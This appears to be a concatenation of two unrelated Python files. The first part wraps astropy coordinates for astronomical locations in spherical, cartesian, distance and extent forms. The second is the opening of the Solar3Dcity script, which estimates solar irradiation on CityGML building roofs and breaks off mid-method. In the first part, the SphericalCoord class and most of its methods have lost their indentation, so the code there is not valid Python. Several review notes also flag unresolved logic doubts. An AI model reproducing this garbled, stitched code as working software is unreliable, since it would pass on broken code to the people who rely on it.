    ECLIPTIC = ('barycentrictrueecliptic', 'sosy barycenter')
    # Galactic coordinates
    GALACTIC = ('galactic', 'sun')

    def __init__(self, sys, anchor):
        # sys: astropy frame name string; anchor: name of the reference point.
        self.sys = sys
        self.anchor = anchor

    @staticmethod
    def get_by_sys(sys):
        """Map an astropy frame name string OR frame instance to a CRS member.

        Accepting instances lets callers pass SkyCoord.frame directly.

        :raises ValueError: for an unsupported frame
        """
        if sys == 'icrs' or isinstance(sys, ICRS):
            return CRS.ICRS
        elif sys == 'altaz' or isinstance(sys, AltAz):
            return CRS.HORIZONTAL
        elif sys == 'barycentrictrueecliptic' or isinstance(sys, BarycentricTrueEcliptic):
            return CRS.ECLIPTIC
        elif sys == 'galactic' or isinstance(sys, Galactic):
            return CRS.GALACTIC
        else:
            raise ValueError("System {0} not supported".format(sys))
# Well-known reference points mapped to the frame name anchored at them.
# NOTE(review): 'sun' maps to 'ecliptic', but the frame string used elsewhere
# in this module is 'barycentrictrueecliptic' — confirm which is intended.
REFPOINTS = {'observer': 'altaz', 'earth': 'altaz', 'sosy barycenter': 'icrs',
             'sun': 'ecliptic', 'galactic center': 'galactic'}
class SphericalCoord(CcLocation):
"""
A spherical pair of coordinates specified by a reference frame
"""
def __init__(self, **args):
    """
    Wrapping up SkyCoord in a spherical or unitspherical representation

    :param args: Arguments forming the SkyCoord. Must have at least a
        longitude (``lon``), a latitude (``lat``) and a ``frame``, or a
        ready-made ``skycoord`` object. Optional extras: ``distance_module``,
        ``parallax``, ``observer`` as (lat, lon, height), ``time``.
    :raises LocationError: if neither a skycoord nor lon/lat/frame is given
    """
    self.representation = 'spherical'
    self.__args = args
    # Pop the additional info not related to AstroPy out and save them as attributes
    # Apparent magnitude minus absolute magnitude. Type: Float
    self.distance_module = args.pop('distance_module', None)
    # Parallax as visible from earth. Type: Float
    self.parallax = args.pop('parallax', None)
    # Bug fix: default the private observer/time fields so later checks
    # (e.g. in __create_horizontal) see None instead of raising
    # AttributeError when no observer/time was supplied.
    self.__observer = None
    self.__time = None
    # Observer's position on earth, given as (lat, lon, height).
    self.observer = args.pop('observer', None)
    if self.observer:
        self.__observer = EarthLocation(lon=self.observer[1] * u.deg, lat=self.observer[0] * u.deg,
                                        height=self.observer[2] * u.m)
    # Time this position was observed, depending on the observer's time zone
    self.time = args.pop('time', None)
    if self.time:
        # Approximate the local-time -> UTC offset as 15 degrees per hour.
        # Bug fix: the offset derives from the LONGITUDE, which per the
        # EarthLocation call above is observer[1], not observer[0].
        offset = int(self.observer[1] / 15) * u.hour
        self.__time = Time(self.time) - offset
    if 'skycoord' in args:
        self.__coord = args['skycoord']
    else:
        try:
            lon = args.pop('lon')
            lat = args.pop('lat')
            frame = args.pop('frame')
            if frame == 'altaz':
                self.__coord = self.__create_horizontal(lon, lat, **args)
            else:
                self.__coord = self.__create_skycoord(lon, lat, frame, **args)
        except KeyError:
            raise LocationError("A 2d Position needs a longitude, a latitude and a reference system.")
@property
def lon(self):
return switch_frame(self.frame, lambda c: c.ra.value, lambda c: c.az.value, lambda c: c.lon.value,
lambda c: c.l.value, self.__coord)
@property
def lat(self):
return switch_frame(self.frame, lambda c: c.dec.value, lambda c: c.alt.value, lambda c: c.lat.value,
lambda c: c.b.value, self.__coord)
@property
def frame(self):
return CRS.get_by_sys(self.__coord.frame)
def __eq__(self, other):
return other.lon == self.lon and other.lat == self.lat and other.frame == self.frame
def __hash__(self):
return hash(self.frame) + hash(self.lon + self.lat)
def __create_skycoord(self, lon, lat, frame, **args):
try:
distance = args.pop('distance', distance_to_refpoint(self, CRS.get_by_sys(frame).anchor))
return SkyCoord(((lon + 360) % 360) * u.deg, lat * u.deg, frame=frame,
representation="spherical", distance=distance * u.pc, **args)
except ValueError:
return SkyCoord(((lon + 360) % 360) * u.deg, lat * u.deg, frame=frame,
representation="unitspherical")
def __create_horizontal(self, lon, lat, **args):
if not self.__observer or not self.__time:
raise ValueError("A horizontal representation needs an observer's location and an observation time.")
args['location'] = self.__observer
args['obstime'] = self.__time
return self.__create_skycoord(lon, lat, 'altaz', **args)
def distance(self, ground=None):
if not ground:
try:
return self.__coord.distance
except AttributeError:
return 1
if ground in REFPOINTS:
return distance_to_refpoint(self, ground)
if ground.representation == 'extend':
return ground.distance(self)
if ground.representation != self.representation:
return translate(self, ground.representation).distance(ground)
else:
return self.__coord.separation(ground.__coord)
def is_at(self, ground):
try:
self.change_frame(ground.frame)
return self.lon == ground.lon and self.lat == ground.lat
except ValueError:
return False
def is_in(self, ground):
return self.__coord.get_constellation() == ground.constellation
def is_part(self, ground):
try:
return self in ground.members
except AttributeError:
return False
def is_neighbor(self, ground):
try:
return self.neighborhood == ground.neighborhood
except AttributeError:
return False
def change_frame(self, frame):
"""
Changes the reference frame to the given one
:param frame: A new reference frame
:return:
"""
if frame == 'altaz':
try:
self.__coord = self.__coord.transform_to(AltAz(location=self.__observer, obstime=self.__time))
except AttributeError:
raise LocationError("A horizontal representation needs an observer location and a time.")
elif frame in ['icrs', 'barycentrictrueecliptic', 'galactic']:
self.__coord.transform_to(frame)
else:
raise LocationError("The frame {0} is currently not supported".format(frame))
def make_extend(self, a, b, c):
if self.__coord.representation == 'spherical':
return AstroExtent(self, a, b, c)
else:
raise LocationError("A distance is necessary to extend a 2dPosition.")
def voronoi_set(self, points):
"""
Calculate the voronoi space of this location
:param points: A set of points
:return: The voronoi space based on a set of points
"""
voronoi = []
for p in points:
nearest = True
for q in (points - p):
if p.distance(self) > p.distance(q):
nearest = False
break
if nearest:
voronoi.append(p)
return AstroExtent(self, voronoi)
def translate_to_cartesian(self):
self.__coord.representation = 'cartesian'
return CartesianCoord(skycoord=self.__coord)
def translate_to_distance(self):
if self.__coord.representation == 'unitspherical':
raise LocationError("No distance available.")
else:
return Distance(self.__coord.distance, self.frame.anchor, **self.__args)
class CartesianCoord(CcLocation):
    """
    A position in three dimensional cartesian coordinates, stored relative to
    an origin (a named reference point or another location).
    """

    def __init__(self, **args):
        """
        AstroPosition in three dimensional cartesian coordinates.

        :param args: Arguments for coordinate creation. Contains at least
            ``x``, ``y``, ``z`` and an ``origin`` which is either a reference
            point name (see REFPOINTS) or another CartesianCoord -- or a
            ready-made ``skycoord``.
        :raises LocationError: if a coordinate or the origin is missing.
        """
        self.representation = 'cartesian'
        self.__args = args
        if 'skycoord' in args:
            # NOTE(review): in this branch self.origin is never set, so the
            # x/y/z properties and distance() will raise -- confirm intent.
            self.__coord = args['skycoord']
        else:
            try:
                x = args.pop('x')
                y = args.pop('y')
                z = args.pop('z')
                origin = args.pop('origin')
            except KeyError:
                raise LocationError("A 3d position needs at least three coordinates and an origin")
            # Record the origin before building the coordinate: the original
            # read self.origin while computing the relative offsets below,
            # before it had ever been assigned (an AttributeError at runtime).
            self.origin = origin
            if origin in REFPOINTS:
                self.__coord = SkyCoord(x, y, z, representation='cartesian',
                                        frame=REFPOINTS[origin], **args)
            else:
                # Store the offsets relative to the origin location.
                self.__coord = SkyCoord(x - origin.__coord.x, y - origin.__coord.y,
                                        z - origin.__coord.z, frame=origin.__coord.frame,
                                        representation='cartesian', **args)

    @property
    def x(self):
        # NOTE(review): assumes self.origin is another CartesianCoord; for a
        # named reference-point origin there is no origin.__coord -- confirm.
        return self.__coord.x + self.origin.__coord.x

    @property
    def y(self):
        return self.__coord.y + self.origin.__coord.y

    @property
    def z(self):
        return self.__coord.z + self.origin.__coord.z

    def distance(self, ground=None):
        """3d distance to ``ground``; without a ground, distance to the origin."""
        if not ground:
            try:
                return self.__coord.separation_3d(self.origin)
            except AttributeError:
                return 1
        if ground.representation == 'extend':
            return ground.distance(self)
        if ground.representation != self.representation:
            return translate(self, ground.representation).distance(ground)
        return self.__coord.separation_3d(ground.__coord)

    def is_at(self, ground):
        """True when both positions share the same coordinates (same origin)."""
        if ground.representation == 'extend':
            return ground.is_at(self)
        try:
            if self.origin != ground.origin:
                self.change_origin(ground.origin)
            return self.x == ground.x and self.y == ground.y and self.z == ground.z
        except AttributeError:
            return False

    def is_in(self, ground):
        """True when this point lies inside ground's ellipsoid or any sub-space."""
        try:
            self.change_origin(ground.footprint)
            if ((self.x / ground.a) ** 2 + (self.y / ground.b) ** 2 + (self.z / ground.c) ** 2) <= 1:
                return True
            for subspace in ground.members:
                if self.is_in(subspace):
                    return True
            return False
        except AttributeError:
            return False

    def is_part(self, ground):
        """True when this position is one of ground's members."""
        try:
            return self in ground.members
        except AttributeError:
            return False

    def is_neighbor(self, ground):
        """True when both locations share the same neighborhood."""
        try:
            return self.neighborhood == ground.neighborhood
        except AttributeError:
            return False

    def change_origin(self, origin):
        """Re-express this position relative to a new origin."""
        if origin in REFPOINTS:
            # transform_to returns a new coordinate; the original dropped it,
            # leaving the stored coordinate unchanged.
            self.__coord = self.__coord.transform_to(REFPOINTS[origin])
            self.origin = origin
        else:
            shifted = self.__coord.transform_to(origin.__coord.frame)
            self.__coord = SkyCoord(shifted.x - origin.__coord.x, shifted.y - origin.__coord.y,
                                    shifted.z - origin.__coord.z, frame=origin.__coord.frame,
                                    representation='cartesian', **self.__args)
            self.origin = origin

    def make_extend(self, a, b, c):
        """Create an ellipsoid extent with radii a, b, c around this position."""
        # Keyword arguments: passed positionally (as before) these values
        # would land on AstroExtent's members/constellation/a parameters.
        return AstroExtent(self, a=a, b=b, c=c)

    def translate_to_spherical(self):
        """Re-express this position as a 2d spherical coordinate."""
        self.__coord.representation = 'spherical'
        return SphericalCoord(skycoord=self.__coord)

    def translate_to_distance(self):
        """Collapse this position to a distance from its origin."""
        if self.__coord.representation == 'unitspherical':
            raise LocationError("No distance available.")
        else:
            return Distance(self.__coord.distance, self.origin, **self.__args)
class Distance(CcLocation):
    """
    A location described by the distance to a reference object.

    Extra keyword arguments are kept both in the private argument store (so
    the location can later be rebuilt as a 2d/3d position) and as attributes.
    """

    def __init__(self, distance, reference, **args):
        """
        :param distance: Distance to the reference object (kpc, per __str__).
        :param reference: The object the distance is measured from.
        """
        self.representation = 'distance'
        # Stored under a private name: the original assigned ``self.distance``,
        # which shadowed the distance() method and made it uncallable.
        self._distance = distance
        self.reference = reference
        self.__args = args
        for arg in args:
            setattr(self, arg, args[arg])

    def __lt__(self, other):
        return self._distance < other._distance

    def __le__(self, other):
        return self._distance <= other._distance

    def __eq__(self, other):
        return self._distance == other._distance and self.reference == other.reference

    def __ge__(self, other):
        return self._distance >= other._distance

    def __gt__(self, other):
        return self._distance > other._distance

    def __hash__(self):
        # Tuple hash instead of string concatenation: the original required
        # self.reference to be a string and failed otherwise.
        return hash((self.reference, self._distance))

    def __str__(self):
        return "{a} kpc from {b} away".format(a=self._distance, b=self.reference)

    def distance(self, ground=None):
        """Distance to ``ground`` (or to the reference object when omitted)."""
        if not ground or ground == self.reference:
            return self._distance
        try:
            # If possible, calculate the spherical separation with the
            # haversine formula. Requires self.lat/self.lon to have been
            # supplied via the constructor's keyword arguments.
            phi = 2 * self._distance * m.asin(m.sqrt(m.sin((ground.lat - self.lat) / 2) ** 2 +
                                                     m.cos(self.lat) * m.cos(ground.lat) *
                                                     m.sin((ground.lon - self.lon) / 2) ** 2))
            d = ground.distance(self.reference)
            # Then use pythagoras (law of cosines) for the object distance.
            return m.sqrt(self._distance ** 2 + d ** 2 - 2 * self._distance * d * m.cos(phi))
        except AttributeError:
            raise LocationError("The distance between these two locations can't be computed.")

    def is_at(self, ground):
        """True when ground is a distance of the same magnitude."""
        if ground.representation == 'distance':
            return self._distance == ground._distance
        return False

    def is_in(self, ground):
        """True when this distance lies within ground."""
        if ground.representation == 'distance':
            return self._distance <= ground._distance
        try:
            # The original lacked this return statement and silently
            # returned None for extent grounds.
            return self._distance <= ground.half_axis
        except AttributeError:
            return False

    def is_part(self, ground):
        """True when this location is one of ground's members."""
        try:
            return self in ground.members
        except AttributeError:
            return False

    def make_extend(self, a, b):
        """Create an extent around the reference point."""
        try:
            # Keyword arguments: the original passed these positionally,
            # which mapped the distance onto AstroExtent's ``members``.
            # NOTE(review): mapping (distance, a, b) onto radii (a, b, c) --
            # confirm the intended radii assignment.
            return AstroExtent(self.reference, a=self._distance, b=a, c=b)
        except AttributeError:
            raise LocationError("Can't make an extend from this distance. There are no coordinates for the footprint.")

    def is_neighbor(self, ground):
        """True when both locations share the same neighborhood."""
        try:
            return self.neighborhood == ground.neighborhood
        except AttributeError:
            return False

    def translate_to_spherical(self):
        """Rebuild a 2d position from the stored constructor arguments."""
        try:
            return SphericalCoord(**self.__args)
        except LocationError:
            raise LocationError("The distance holds not enough arguments to create a 2d position")

    def translate_to_cartesian(self):
        """Rebuild a 3d position from the stored constructor arguments."""
        try:
            return CartesianCoord(**self.__args)
        except LocationError:
            raise LocationError("The distance holds not enough arguments to create a 3d position")
class AstroExtent(CcLocation):
    """
    An area based on a three dimensional footprint position.

    Can include other locations. May be bounded (usually as an ellipsoid
    space with radii a, b, c).
    """

    def __init__(self, footprint, members=None, constellation=None, a=0, b=0, c=0):
        """
        :param footprint: Footprint position. Can be any kind of location
            except distance.
        :param members: Other locations that are part of this location.
        :param constellation: The boundary of this extent is defined by this
            constellation.
        :param a: radius 1
        :param b: radius 2
        :param c: radius 3
        """
        self.representation = 'extend'
        self.footprint = footprint
        # Fresh list per instance: the original used a mutable default
        # argument, so every extent created without members shared one list.
        self.members = [] if members is None else members
        self.constellation = constellation
        self.a = a
        self.b = b
        self.c = c

    @property
    def half_axis(self):
        """The largest of the three radii."""
        return max(self.a, self.b, self.c)

    def add_member(self, member):
        """Add a location to this extent and mark this extent as its neighborhood."""
        self.members.append(member)
        member.neighborhood = self

    def distance(self, ground=None):
        """Distance between the footprint and ground (default added for
        consistency with the other location classes)."""
        return self.footprint.distance(ground)

    def is_at(self, ground):
        """Delegates to the footprint position."""
        return self.footprint.is_at(ground)

    def is_in(self, ground):
        """Delegates to the footprint position."""
        return self.footprint.is_in(ground)

    def is_part(self, ground):
        """True when this extent is one of ground's members."""
        try:
            return self in ground.members
        except AttributeError:
            return False

    def is_neighbor(self, ground):
        """True when both locations share the same neighborhood."""
        try:
            return self.neighborhood == ground.neighborhood
        except AttributeError:
            return False

    def distance_to_refpoint(self, refpoint):
        """Distance from the footprint to a common reference point."""
        # Delegate to the module-level helper: the footprint classes do not
        # define a distance_to_refpoint method of their own, so the original
        # method call always raised AttributeError.
        return distance_to_refpoint(self.footprint, refpoint)
# Module functions for location
def locate(relation, ground, figure, **args):
    """
    Locate an object relative to another phenomena.

    :param relation: The relation that indicates the location
    :param ground: The phenomena that is used to ground the object
    :param figure: The object that is being located
    :param args: Additional information about the location
    :return: A location such as a coordinate, a distance or an extent
    :raises LocationError: for unsupported relations
    """
    # Todo: Not yet generic enough
    if relation == 'ccs':
        lon = float(figure.property('lon'))
        lat = float(figure.property('lat'))
        return SphericalCoord(lon=lon, lat=lat, frame=ground, **args)
    if relation == 'cartesian':
        return CartesianCoord(x=float(figure.property('x')),
                              y=float(figure.property('y')),
                              z=float(figure.property('z')),
                              origin=ground, **args)
    if relation == 'distance':
        return Distance(figure.distance, ground, **args)
    if relation == 'extend':
        # Members and constellation are both optional on the figure.
        try:
            members = figure.property('members')
        except AttributeError:
            members = []
        try:
            constellation = figure.property('constellation')
        except AttributeError:
            constellation = []
        return AstroExtent(ground, members=members, constellation=constellation)
    raise LocationError("The relation '{0}' is currently not supported.".format(relation))
def resolve(relation, figure, ground):
    """
    Resolves the given relation between two locations.

    :param relation: The relation that needs to be resolved; either a
        callable taking (figure, ground) or a supported relation name.
    :param figure: The first location
    :param ground: Another location
    :return: The result of the relation between them
    :raises LocationError: for unsupported relation names (the original
        *returned* the exception object instead of raising it).
    """
    if callable(relation):
        return relation(figure, ground)
    elif relation == 'distance':
        return figure.distance(ground)
    elif relation == 'is_at':
        return figure.is_at(ground)
    elif relation == 'is_in':
        return figure.is_in(ground)
    elif relation == 'is_part':
        return figure.is_part(ground)
    elif relation == 'is_neighbor':
        return figure.is_neighbor(ground)
    else:
        raise LocationError("The relation {0} is currently not supported".format(relation))
def translate(location, representation):
    """
    Translate the given location into an other representation.

    :param location: A location
    :param representation: The new representation ('spherical', 'cartesian'
        or 'distance')
    :return: The translated location (the location itself when it already
        has the requested representation)
    :raises LocationError: for 'extend' or unknown representations
    """
    if location.representation == representation:
        return location
    translator_names = {
        'spherical': 'translate_to_spherical',
        'cartesian': 'translate_to_cartesian',
        'distance': 'translate_to_distance',
    }
    if representation in translator_names:
        return getattr(location, translator_names[representation])()
    if representation == "extend":
        raise LocationError("No instant transformation into extend. Use make_extend instead.")
    raise LocationError("The representation '{0}' is currently not supported.".format(representation))
def distance_to_refpoint(location, refpoint):
    """
    Calculates the distance to common astronomic reference points.

    :param location: The location
    :param refpoint: The reference point
    :return: the distance in parsec
    """
    # Todo: Just rudimentary implemented. Not 100% correct yet
    # Observer and earth share the earth-distance estimate; the solar-system
    # barycenter, sun and galactic center all use the sun-distance estimate.
    near_earth = distance_to_earth
    near_sun = distance_to_sun
    return switch_refpoint(refpoint, near_earth, near_earth,
                           near_sun, near_sun, near_sun, location)
def distance_to_earth(location):
    """
    Calculates the distance to earth.

    :param location: The location; must carry a distance module or a parallax.
    :return: Distance to earth in parsec
    :raises ValueError: when neither quantity is available.
    """
    # getattr with a None default treats a missing attribute exactly like an
    # attribute explicitly set to None.
    modulus = getattr(location, 'distance_module', None)
    if modulus is not None:
        # Distance modulus relation: d = 10 ** ((m - M + 5) / 5)
        return 10 ** ((modulus + 5) / 5)
    parallax = getattr(location, 'parallax', None)
    if parallax is not None:
        # Distance in parsec is the reciprocal of the parallax in arcsec.
        return 1 / parallax
    raise ValueError("There is no way to find out the distance to earth for this location.")
def distance_to_sun(location):
    """
    Calculates the distance to the sun.

    :param location: The location
    :return: Distance to sun in parsec
    """
    # Combine the earth-sun baseline (0.000004848 pc, roughly 1 AU) with the
    # earth distance via Pythagoras.
    earth_distance = distance_to_earth(location)
    return m.sqrt(0.000004848 ** 2 + earth_distance ** 2)
def switch_frame(frame, f_icrs, f_hor, f_ecl, f_gal, *params):
    """
    Differ between the reference frames.

    :param frame: The reference frame that is switched
    :param f_icrs: Transformation function for ICRS
    :param f_hor: Transformation function for horizontal frame
    :param f_ecl: Transformation function for ecliptic frame
    :param f_gal: Transformation function for galactic frame
    :param params: Parameters for the functions
    :return: The expected value returned by the functions depending on the
        reference frame
    :raises LocationError: for unsupported frames
    """
    handlers = {
        CRS.ICRS: f_icrs,
        CRS.HORIZONTAL: f_hor,
        CRS.ECLIPTIC: f_ecl,
        CRS.GALACTIC: f_gal,
    }
    if frame not in handlers:
        raise LocationError("The reference frame {0} is currently not supported. I'm sorry".format(frame))
    return handlers[frame](*params)
def switch_refpoint(refpoint, f_obs, f_earth, f_bar, f_sun, f_gal, *params):
    """
    Dispatch on a reference-point name and apply the matching function.

    :param refpoint: One of 'observer', 'earth', 'sosy barycenter', 'sun'
        or 'galactic center'.
    :param params: Parameters forwarded to the selected function.
    :raises ValueError: for unknown reference points.
    """
    dispatch = {
        'observer': f_obs,
        'earth': f_earth,
        'sosy barycenter': f_bar,
        'sun': f_sun,
        'galactic center': f_gal,
    }
    try:
        handler = dispatch[refpoint]
    except KeyError:
        raise ValueError("Unknown reference point: {0}".format(refpoint))
    return handler(*params)
"""
Exceptions
"""
class LocationError(Exception):
    """Raised when a location cannot be built, transformed or compared."""

    def __init__(self, message):
        # Forward the message to the base Exception so str() works as usual.
        super(LocationError, self).__init__(message)
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# The MIT License (MIT)
# This code is part of the Solar3Dcity package
# Copyright (c) 2015
# Filip Biljecki
# Delft University of Technology
# fbiljecki@gmail.com
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import polygon3dmodule
import markup3dmodule
from lxml import etree
import irr
import argparse
import glob
import os
import pickle
from scipy import interpolate
import numpy as np
import math
#-- Name spaces
ns_citygml = "http://www.opengis.net/citygml/2.0"
ns_gml = "http://www.opengis.net/gml"
ns_bldg = "http://www.opengis.net/citygml/building/2.0"
ns_xsi = "http://www.w3.org/2001/XMLSchema-instance"
ns_xAL = "urn:oasis:names:tc:ciq:xsdschema:xAL:2.0"
ns_xlink = "http://www.w3.org/1999/xlink"
ns_dem = "http://www.opengis.net/citygml/relief/2.0"
# lxml namespace map; the None key is the default (unprefixed) namespace.
nsmap = {
    None : ns_citygml,
    'gml': ns_gml,
    'bldg': ns_bldg,
    'xsi' : ns_xsi,
    'xAL' : ns_xAL,
    'xlink' : ns_xlink,
    'dem' : ns_dem
}
#-- ARGUMENTS
# -i -- input directory (it will read ALL CityGML files in a directory)
# -o -- output directory (it will output the enriched CityGMLs in that directory with the naming convention Delft.gml becomes Delft-solar.gml)
# -f -- factors (precomputed tilt-orientation-factors)
PARSER = argparse.ArgumentParser(description='Calculate the yearly solar irradiation of roof surfaces.')
PARSER.add_argument('-i', '--directory',
                    help='Directory containing CityGML file(s).', required=True)
PARSER.add_argument('-o', '--results',
                    help='Directory where the enriched "solar" CityGML file(s) should be written.', required=True)
PARSER.add_argument('-f', '--factors',
                    help='Load the TOF if previously precomputed', required=False)
ARGS = vars(PARSER.parse_args())
DIRECTORY = ARGS['directory']
RESULT = ARGS['results']
FACTORS = ARGS['factors']
#-- Load the pre-computed dictionary
if not FACTORS:
    loadDict = False
else:
    loadDict = True
#-- If the TOFs are already precomputed
if loadDict:
    with open(FACTORS, "rb") as myFile:
        TOF_strings = pickle.load(myFile)
    # Convert the pickled {azimuth-str: {tilt-str: factor-str}} mapping into
    # a float-keyed dictionary, rounding keys to two decimals so lookups
    # from squareVerts() hit exact keys.
    TOF = {}
    for azStr in TOF_strings:
        azFloat = round(float(azStr), 2)
        TOF[azFloat] = {}
        for tiStr in TOF_strings[azStr]:
            tiFloat = round(float(tiStr), 2)
            TOF[azFloat][tiFloat] = float(TOF_strings[azStr][tiStr])
    # Grid resolution, taken as the gap between the two smallest azimuths.
    # NOTE(review): assumes a uniformly spaced azimuth grid -- confirm.
    TS = sorted(TOF)
    res = TS[1]-TS[0]
else:
    pass#import knmicloud
def squareVerts(a, t, res):
    """Get the vertices of the interpolation square.

    Returns [[aB, aT], [tB, tT]]: the grid values (at resolution ``res``)
    directly below and above the azimuth ``a`` and the tilt ``t``.
    """
    inv = 1 / res

    def bounds(value):
        # Snap down/up to the grid; widen a degenerate (exactly on-grid)
        # interval by one resolution step so interpolation has a rectangle.
        low = math.trunc(value * inv) / inv
        high = math.ceil(value * inv) / inv
        if high == low:
            high += res
        return [low, high]

    return [bounds(a), bounds(t)]
def bilinear_interpolation(x, y, points):
    # Function taken from http://stackoverflow.com/a/8662355/4443114
    '''Interpolate (x,y) from values associated with four points.

    The four points are a list of four triplets: (x, y, value).
    The four points can be in any order. They should form a rectangle.

    >>> bilinear_interpolation(12, 5.5,
    ...                        [(10, 4, 100),
    ...                         (20, 4, 200),
    ...                         (10, 6, 150),
    ...                         (20, 6, 300)])
    165.0
    '''
    # See formula at: http://en.wikipedia.org/wiki/Bilinear_interpolation
    # Sorting orders the corners by x, then by y.
    (x1, y1, q11), (_x1, y2, q12), (x2, _y1, q21), (_x2, _y2, q22) = sorted(points)
    if (x1, x2, y1, y2) != (_x1, _x2, _y1, _y2):
        raise ValueError('points do not form a rectangle')
    if not (x1 <= x <= x2 and y1 <= y <= y2):
        raise ValueError('(x, y) not within the rectangle')
    weighted = (q11 * (x2 - x) * (y2 - y)
                + q21 * (x - x1) * (y2 - y)
                + q12 * (x2 - x) * (y - y1)
                + q22 * (x - x1) * (y - y1))
    # The trailing float coercion keeps true division under Python 2.
    return weighted / ((x2 - x1) * (y2 - y1) + 0.0)
def interpolator(grid_subset, coord):
    """Bilinear interpolation of TOF values.

    grid_subset is [[azLow, azHigh], [tiLow, tiHigh]] as produced by
    squareVerts(); coord is the [azimuth, tilt] pair to interpolate at.
    """
    az_lo, az_hi = grid_subset[0]
    ti_lo, ti_hi = grid_subset[1]
    # Sample the TOF lookup table at the four corners of the square.
    corners = [(az, ti, TOF[az][ti])
               for az in (az_lo, az_hi)
               for ti in (ti_hi, ti_lo)]
    return bilinear_interpolation(coord[0], coord[1], corners)
def irr_from_tof(tilt, azimuth):
    """Construct the square with four TOF values around the point for interpolation."""
    # Uses the module-level grid resolution ``res`` derived from the TOF file.
    square = squareVerts(azimuth, tilt, res)
    return interpolator(square, [azimuth, tilt])
class Building(object):
    """Wrapper around a CityGML <Building> element.

    Computes the total surface area per semantic class and, for every roof
    polygon, the azimuth, tilt and yearly solar irradiation.

    NOTE(review): solarinfo() also appends to the module-level globals
    ``listofxmlroofsurfaces`` and ``roofsurfacedata`` and reads ``loadDict``;
    instances therefore only work inside the script's per-file loop.
    """

    def __init__(self, xml, id):
        # :param xml: lxml element of the <Building>.
        # :param id: gml:id of the building.
        #-- ID of the building
        self.id = id
        #-- XML tree of the building
        self.xml = xml
        #-- Data for each roof surface required for the computation of the solar stuff
        self.roofdata = {}
        #-- List of IDs of openings, not to mess with usable roof surfaces
        self.listOfOpenings = []
        #-- Compute the total areas of surfaces per semantic class (not really required; reserved for future use)
        #-- RoofSurface
        self.RoofSurfaceArea = self.roofarea()
        #-- WallSurface
        self.WallSurfaceArea = self.wallarea()
        #-- GroundSurface
        self.GroundSurfaceArea = self.groundarea()
        #-- Openings
        # NOTE: openingarea() also fills self.listOfOpenings, which
        # solarinfo() relies on -- keep this call before solarinfo().
        self.OpeningArea = self.openingarea()
        #-- All surfaces (including openings)
        self.AllArea = self.allarea()
        #-- All surfaces without openings
        self.RealArea = self.AllArea - self.OpeningArea
        #-- Do the solar estimation
        self.solarinfo()

    def solarinfo(self):
        """Computes the area, azimuth, and tilt for each roof surface (id compulsory)."""
        # (lat, lon) used when irradiation is estimated instead of sampled
        # from the TOF table; roughly Delft, NL.
        place = (52.01, 4.36)
        for roofsurface in self.roofsurfaces:
            #-- Skip the openings
            if roofsurface.attrib['{%s}id' %ns_gml] in self.listOfOpenings:
                continue
            #-- Add it to the list (module-level global, reset per file)
            listofxmlroofsurfaces.append(roofsurface)
            #-- gml:id of the polygon
            pid = roofsurface.attrib['{%s}id' %ns_gml]
            #-- Area
            area = polygon3dmodule.getAreaOfGML(roofsurface, True)
            #-- Compute the normal
            norm = polygon3dmodule.getNormal(markup3dmodule.GMLpoints(markup3dmodule.polydecomposer(roofsurface)[0][0]))
            #-- Get the azimuth and tilt from the surface normal
            az, tilt = polygon3dmodule.getAngles(norm)
            az = round(az, 3)
            #-- 360 -> 0 degrees
            if az == 360.0:
                az = 0.0
            tilt = round(tilt, 3)
            #-- Peculiar problems with the normals, with a cheap solution. Luckily very uncommon.
            if tilt == 180:
                tilt = 0.0
            if tilt >= 180:
                tilt = tilt - 180.01
            elif tilt > 90:
                tilt = tilt - 90.01
            elif tilt == 90:
                tilt = 89.9
            #-- Flat surfaces always have the azimuth zero
            if tilt == 0.0:
                az = 0.0
            #-- If the TOF file is loaded, sample the irradiance
            if loadDict:
                irradiation = irr_from_tof(tilt, az)
            #-- If the TOF file is not loaded, estimate the values
            else:
                irradiation = irr.yearly_total_irr(place, az, tilt)
            #-- Add the values (both per-building and module-level)
            self.roofdata[pid] = {'area' : area, 'azimuth' : az, 'tilt' : tilt, 'irradiation' : irradiation, 'total_irradiation' : irradiation*area}
            roofsurfacedata[pid] = {'area' : area, 'azimuth' : az, 'tilt' : tilt, 'irradiation' : irradiation, 'total_irradiation' : irradiation*area}
            #self.roofdata.append([self.id, pid, area, az, tilt, irradiation, irradiation*area])
        self.sumIrr = 0
        #-- Sum the values for the building
        for rs in self.roofdata:
            self.sumIrr += self.roofdata[rs]['total_irradiation']

    def roofarea(self):
        """The total area of RoofSurface.

        Side effect: fills self.roofs and self.roofsurfaces.
        """
        self.roofs = []
        self.roofsurfaces = []
        roofarea = 0.0
        openings = 0.0
        for child in self.xml.getiterator():
            if child.tag == '{%s}RoofSurface' %ns_bldg:
                self.roofs.append(child)
                openings += oparea(child)
        for surface in self.roofs:
            for w in surface.findall('.//{%s}Polygon' %ns_gml):
                self.roofsurfaces.append(w)
        for roofsurface in self.roofsurfaces:
            roofarea += polygon3dmodule.getAreaOfGML(roofsurface, True)
            #-- Compute the normal
            norm = polygon3dmodule.getNormal(markup3dmodule.GMLpoints(markup3dmodule.polydecomposer(roofsurface)[0][0]))
            # NOTE(review): the result of getAngles is discarded here --
            # confirm whether this call is needed at all.
            polygon3dmodule.getAngles(norm)
        return roofarea - openings

    def wallarea(self):
        """The total area of WallSurfaces."""
        self.walls = []
        self.wallsurfaces = []
        wallarea = 0.0
        openings = 0.0
        #-- Account for openings
        for child in self.xml.getiterator():
            if child.tag == '{%s}WallSurface' %ns_bldg:
                self.walls.append(child)
                openings += oparea(child)
        for surface in self.walls:
            for w in surface.findall('.//{%s}Polygon' %ns_gml):
